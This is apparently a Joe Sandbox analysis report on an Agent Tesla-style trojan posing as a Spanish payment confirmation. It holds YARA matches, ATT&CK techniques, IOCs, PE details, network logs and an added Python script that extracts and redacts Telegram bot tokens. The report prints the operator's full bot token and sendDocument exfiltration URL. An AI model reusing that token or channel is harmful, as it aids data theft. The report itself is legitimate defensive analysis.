Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR

Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Confirmaci#U00f3n de pago_shrunk.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3780, type: MEMORYSTR
MITRE ATT&CK matrix, tactics in column order: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Only techniques carrying a signature badge are listed below, with the badge value in brackets; the remaining cells of the matrix are the unpopulated ATT&CK background.

Reconnaissance, Resource Development, Initial Access: none
Execution: Windows Management Instrumentation [121]
Persistence: DLL Side-Loading [1]
Privilege Escalation: DLL Side-Loading [1]; Process Injection [311]
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Software Packing [1]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [11]; Virtualization/Sandbox Evasion [141]; Process Injection [311]
Credential Access: OS Credential Dumping [2]; Input Capture [1]; Credentials in Registry [1]
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]
Lateral Movement: none
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [1]
Command and Control: Web Service [1]; Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [4]
Exfiltration, Impact: none
Source | Detection | Scanner | Label
Confirmaci#U00f3n de pago_shrunk.exe | 39% | ReversingLabs | Win32.Trojan.Generic
Confirmaci#U00f3n de pago_shrunk.exe | 100% | Avira | TR/Dropper.Gen
Confirmaci#U00f3n de pago_shrunk.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://transfer.adttemp.com.br | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/ | 0% | Avira URL Cloud | safe
http://api.telegram.org | 0% | Avira URL Cloud | safe
http://transfer.adttemp.com.brd | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument | 0% | Avira URL Cloud | safe
https://transfer.adttemp.com.br/cCoB5/anonymous.txt | 0% | Avira URL Cloud | safe
https://transfer.adttemp.com.br | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
transfer.adttemp.com.br | 104.196.109.209 | true | false | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument | true | Avira URL Cloud: safe | unknown
https://transfer.adttemp.com.br/cCoB5/anonymous.txt | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://transfer.adttemp.com.br | Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/ | Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp; RegAsm.exe, 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://transfer.adttemp.com.brd | Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | RegAsm.exe, 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://transfer.adttemp.com.br | Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
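Every api.telegram.org URL in the tables above is rated "safe" by the URL scanners, which is expected: those verdicts are per host, and the host is a legitimate public API that many benign clients use. What identifies this operator is the bot token embedded in the URL path (the numeric bot ID before the colon and the secret after it), and the sendDocument method is the exfiltration call. The script below is an added example, not part of the Joe Sandbox report: it pulls Bot API URLs out of a list of strings (here the URLs the report lists for this sample), collapses them into one indicator per bot ID, notes which API methods were seen, and redacts the secret so the indicator can be shared. Anyone holding the full token can drive the bot through the same API, so a shared report should carry only the bot ID. The function names and the EXFIL_METHODS list are this example's own choices.

```python
"""Extract and redact Telegram Bot API C2 indicators from strings.

Added example, not part of the Joe Sandbox report. SAMPLE_STRINGS holds the
URLs the report lists for this sample; everything else is this example's own.
"""
import re
from urllib.parse import urlsplit

# Bot tokens are "<numeric bot id>:<secret>"; the Bot API puts the whole token
# in the URL path, so any memory string or proxy log with the URL leaks it.
BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})"
    r"(?:/(?P<method>[A-Za-z]+))?"
)

# Methods that move victim data out; chosen for this example.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}


def find_bot_urls(strings):
    """Yield (bot_id, secret, method-or-None) for every Bot API URL in the strings."""
    for s in strings:
        for m in BOT_URL.finditer(s):
            yield m.group("bot_id"), m.group("secret"), m.group("method")


def redact(url):
    """Replace the token secret so the URL can be shared without handing out the key."""
    def _sub(m):
        tail = f"/{m.group('method')}" if m.group("method") else ""
        return f"https://api.telegram.org/bot{m.group('bot_id')}:<redacted>{tail}"
    return BOT_URL.sub(_sub, url)


def build_iocs(strings):
    """Collapse all hits into one record per bot id with the API methods seen."""
    iocs = {}
    for bot_id, secret, method in find_bot_urls(strings):
        rec = iocs.setdefault(bot_id, {"secret_len": len(secret), "methods": set(), "exfil": False})
        if method:
            rec["methods"].add(method)
            rec["exfil"] = rec["exfil"] or method in EXFIL_METHODS
    return iocs


def is_telegram_host(url):
    """True for any api.telegram.org URL, including the bare host strings without a token."""
    return urlsplit(url).hostname == "api.telegram.org"


# Constructed list; the values are the URLs from this report's URL tables.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/",
    "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument",
    "http://api.telegram.org",
    "https://transfer.adttemp.com.br/cCoB5/anonymous.txt",
    "https://account.dyn.com/",
]

if __name__ == "__main__":
    for bot_id, rec in build_iocs(SAMPLE_STRINGS).items():
        print(bot_id, sorted(rec["methods"]), "exfil" if rec["exfil"] else "")
    for s in SAMPLE_STRINGS:
        print(redact(s))
```

For network detection the same regex applied to the HTTP path (or to TLS-decrypted proxy logs) keys on the bot ID rather than on the host, which keeps legitimate Telegram traffic out of the alert. Blocking api.telegram.org outright is the blunt alternative where the environment has no business use for it.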
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
104.196.109.209 | transfer.adttemp.com.br | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518505
Start date and time: 2024-09-25 18:50:22 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Confirmaci#U00f3n de pago_shrunk.exe (renamed because original name is a hash value)
Original Sample Name: Confirmacin de pago_shrunk.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 13
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Confirmaci#U00f3n de pago_shrunk.exe
Time | Type | Description
12:51:23 | API Interceptor | 1x Sleep call for process: Confirmaci#U00f3n de pago_shrunk.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe | malicious | MicroClip
149.154.167.220 | Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | AS5AB7c08n.exe | malicious | MicroClip
149.154.167.220 | file.exe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger
149.154.167.220 | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger
149.154.167.220 | test.bat | malicious | MicroClip

Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | the same ten samples listed above for 149.154.167.220, with the same detections and threat names | malicious | (as above) | 149.154.167.220

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | the same ten samples listed above for 149.154.167.220, with the same detections and threat names | malicious | (as above) | 149.154.167.220

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe | malicious | MicroClip | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | file.exe | malicious | LummaC, Vidar | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | file.exe | malicious | LummaC, Vidar | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | https://osoulksa.com/c/Fidelityme | malicious | HTMLPhisher | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | http://rkanet.com | malicious | Unknown | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | NTGcon.msi | malicious | Unknown | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | file.exe | malicious | LummaC, Stealc, Vidar | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | file.exe | malicious | LummaC, Vidar | 104.196.109.209, 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e (JA3 fingerprint) | Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.196.109.209, 149.154.167.220

The fingerprint matches span unrelated families (Snake Keylogger, MicroClip, LummaC, Vidar, Stealc, an HTML phisher), so it identifies a TLS client stack shared by many Windows programs rather than this sample; it is not usable as a sample-specific indicator on its own.
Process: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe
File Type: CSV text
Category: dropped
Size (bytes): 847
Entropy (8bit): 5.345615485833535
Encrypted: false
SSDEEP: 24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5: EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1: 250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256: 5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512: 2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 3.539492620386482
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Confirmaci#U00f3n de pago_shrunk.exe
File size: 208'896 bytes
MD5: 5f249a857aa4ec0d7811cbe49b1eac0e
SHA1: 9bc2fed4cf1f677c009ba9c0c224e15a07ee8dd4
SHA256: e97a53902ccc623ff61147e3b7cb7e9abf77e8a61a401a317891ffaf73a7338a
SHA512: 021890218f651a97b7f2d3a490def666e3a70a55e40355a91ce912eaff80c60728a582128220d8ccc07653d6a131f6bef42892907153b6f25b52ecce22fbfc5c
SSDEEP: 1536:SD8LRJrCwGizMmnLU/lmOfsxdPTWQ7ZnbXnD630VD1:SQdJrCwG7Wo/lmOfsxdrWQFXWEVD1
TLSH: FB14E60A36889711C59476F484FB4A6603E76DD22632C2963DF87B8A5E723A3DDC634C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................................#... ...@....@.. ....................... ............`................................
Icon Hash: 8f82989919951d01
Entrypoint: 0x4123fe
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xAEC31ED1 [Wed Nov 29 10:49:53 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x123b0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x8408 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x20000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x12360 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x10404 | 0x10600 | 4044837c7c3d7dddda7029a942cfb4a3 | False | 0.5387494036259542 | data | 6.016905640132613 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x14000 | 0x1e8 | 0x200 | 9d89f11f2f7efe85ec6025eaf9079f32 | False | 0.861328125 | data | 6.600064443351503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x8408 | 0x8600 | ac53e23b087661ff82fb9228561598c5 | False | 0.28404850746268656 | data | 5.191248821715595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x20000 | 0xc | 0x200 | da2b73780e6bc1e8ac38140886608cbc | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x161c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5487588652482269
RT_ICON | 0x16628 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.37922138836772984
RT_ICON | 0x176d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.28060165975103735
RT_ICON | 0x19c78 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.25614076523382145
RT_GROUP_ICON | 0x1dea0 | 0x3e | data | | | 0.7903225806451613
RT_VERSION | 0x1dee0 | 0x33c | data | | | 0.4251207729468599
RT_MANIFEST | 0x1e21c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T18:51:27.695363+0200 | 2851779 | ETPRO MALWARE Agent Tesla Telegram Exfil | 1 | 192.168.2.8 | 49705 | 149.154.167.220 | 443 | TCP
2024-09-25T18:51:27.695363+0200 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.8 | 49705 | 149.154.167.220 | 443 | TCP
2024-09-25T18:51:27.696072+0200 | 2854281 | ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound | 1 | 149.154.167.220 | 443 | 192.168.2.8 | 49705 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 18:51:22.987673998 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:22.987716913 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:22.987884045 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:22.998611927 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:22.998631954 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.656989098 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.657078028 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.664200068 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.664217949 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.664556026 CEST | 443 | 49704 | 104.196.109.209 | 192.168.2.8
Sep 25, 2024 18:51:23.715066910 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
Sep 25, 2024 18:51:23.775324106 CEST | 49704 | 443 | 192.168.2.8 | 104.196.109.209
